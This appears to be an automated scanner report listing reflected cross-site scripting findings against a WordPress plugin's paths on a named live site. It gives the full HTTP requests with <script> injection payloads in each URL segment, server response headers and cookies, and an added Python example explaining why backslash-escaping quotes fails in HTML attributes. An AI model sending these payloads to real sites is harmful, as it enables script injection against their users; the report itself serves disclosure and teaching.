GET /site/wp-content/pluginsdfc9a"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeafd"><script>alert(1)</script>0b49ecee366 was submitted in the REST URL parameter 4. This input was echoed as eeafd\"><script>alert(1)</script>0b49ecee366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menueeafd"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaa3"><script>alert(1)</script>cfbe353e491 was submitted in the REST URL parameter 5. This input was echoed as daaa3\"><script>alert(1)</script>cfbe353e491 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jsdaaa3"><script>alert(1)</script>cfbe353e491/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcb6"><script>alert(1)</script>4b7a1a7b17f was submitted in the REST URL parameter 6. This input was echoed as 1fcb6\"><script>alert(1)</script>4b7a1a7b17f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6"><script>alert(1)</script>4b7a1a7b17f HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d618f"><script>alert(1)</script>b5bbe65fee5 was submitted in the REST URL parameter 1. This input was echoed as d618f\"><script>alert(1)</script>b5bbe65fee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited618f"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed395"><script>alert(1)</script>4ecb0a29794 was submitted in the REST URL parameter 2. This input was echoed as ed395\"><script>alert(1)</script>4ecb0a29794 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contented395"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf143"><script>alert(1)</script>7ab2e0b1bf was submitted in the REST URL parameter 3. This input was echoed as bf143\"><script>alert(1)</script>7ab2e0b1bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsbf143"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
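The finding above shows the quote coming back as \" and still being reported as exploitable. The following is an added example, not code from the scan report or from the WordPress plugin under test, that shows why: it reimplements PHP's addslashes() (what magic_quotes_gpc applies), renders the report's own payload into an assumed attribute template (the report does not show which attribute of the 404 page echoes the path, so the input element here is an assumption), and parses the result with Python's standard-library HTML parser to see whether a script element appears. The same payload passed through attribute encoding (the htmlspecialchars/ENT_QUOTES equivalent) stays inside the attribute.

```python
"""Added example, not from the scan report or the plugin it tests.

Why a backslash-escaped quote does not stop attribute-context XSS:
HTML attribute values have no backslash escape, so \" still closes
the attribute and the payload becomes markup.
"""
import html
from html.parser import HTMLParser

# Assumption: the report does not show which attribute of the 404 page
# reflects the path, so this template stands in for it.
TEMPLATE = '<input type="text" name="s" value="{}" />'

# Payload and echoed form quoted from the first finding in the report.
PAYLOAD = 'bf143"><script>alert(1)</script>7ab2e0b1bf'
ECHOED = 'bf143\\"><script>alert(1)</script>7ab2e0b1bf'


def addslashes(s):
    """Reimplementation of PHP addslashes(), which magic_quotes_gpc
    (on by default in PHP 5.2) applies to every request value. It is an
    escape for SQL string literals, not for HTML."""
    return (s.replace('\\', '\\\\')
             .replace('"', '\\"')
             .replace("'", "\\'")
             .replace('\0', '\\0'))


def attribute_encode(s):
    """Correct encoding for a double-quoted HTML attribute value, the
    equivalent of PHP htmlspecialchars($s, ENT_QUOTES)."""
    return html.escape(s, quote=True)


class TagCollector(HTMLParser):
    """Record each start tag and its attributes as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)


def render(escaper):
    """Build the page the way the vulnerable template would, after the escaper ran."""
    return TEMPLATE.format(escaper(PAYLOAD))


def parse(markup):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p


def script_tag_created(escaper):
    """True when the payload breaks out of the attribute and becomes a <script> element."""
    return 'script' in parse(render(escaper)).tags


def reflected_value(escaper):
    """The value the parser assigns to the input's value attribute."""
    return parse(render(escaper)).attrs['input']['value']


if __name__ == '__main__':
    print('addslashes reproduces the echoed form in the report:',
          addslashes(PAYLOAD) == ECHOED)
    for name, fn in (('no escaping', lambda s: s),
                     ('addslashes', addslashes),
                     ('htmlspecialchars', attribute_encode)):
        print(f'{name:17} script element created: {script_tag_created(fn)!s:5} '
              f'attribute value: {reflected_value(fn)!r}')
```

With addslashes the attribute value is cut to bf143\ and a script element follows it, exactly the situation the scanner reports; with attribute encoding the whole payload, including the quote and the angle brackets, is the attribute's value and no new element is created.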
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b82fc"><script>alert(1)</script>dedd8e0a44b was submitted in the REST URL parameter 4. This input was echoed as b82fc\"><script>alert(1)</script>dedd8e0a44b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub82fc"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75ce"><script>alert(1)</script>115e8e28446 was submitted in the REST URL parameter 5. This input was echoed as e75ce\"><script>alert(1)</script>115e8e28446 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jse75ce"><script>alert(1)</script>115e8e28446/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca307"><script>alert(1)</script>082b33d15a1 was submitted in the REST URL parameter 6. This input was echoed as ca307\"><script>alert(1)</script>082b33d15a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307"><script>alert(1)</script>082b33d15a1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972b5"><script>alert(1)</script>c3df305ca7c was submitted in the REST URL parameter 1. This input was echoed as 972b5\"><script>alert(1)</script>c3df305ca7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site972b5"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b3e"><script>alert(1)</script>54f1bceee82 was submitted in the REST URL parameter 2. This input was echoed as 60b3e\"><script>alert(1)</script>54f1bceee82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content60b3e"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84f7"><script>alert(1)</script>c0fd9f27655 was submitted in the REST URL parameter 3. This input was echoed as e84f7\"><script>alert(1)</script>c0fd9f27655 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginse84f7"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31fa"><script>alert(1)</script>eb994eb117d was submitted in the REST URL parameter 4. This input was echoed as b31fa\"><script>alert(1)</script>eb994eb117d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menub31fa"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
